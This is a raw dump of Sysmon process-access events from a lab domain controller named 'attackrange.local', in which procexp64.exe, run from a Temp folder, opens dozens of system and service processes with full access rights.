15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784844Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784843Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784842Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:43.081{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:44.096{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 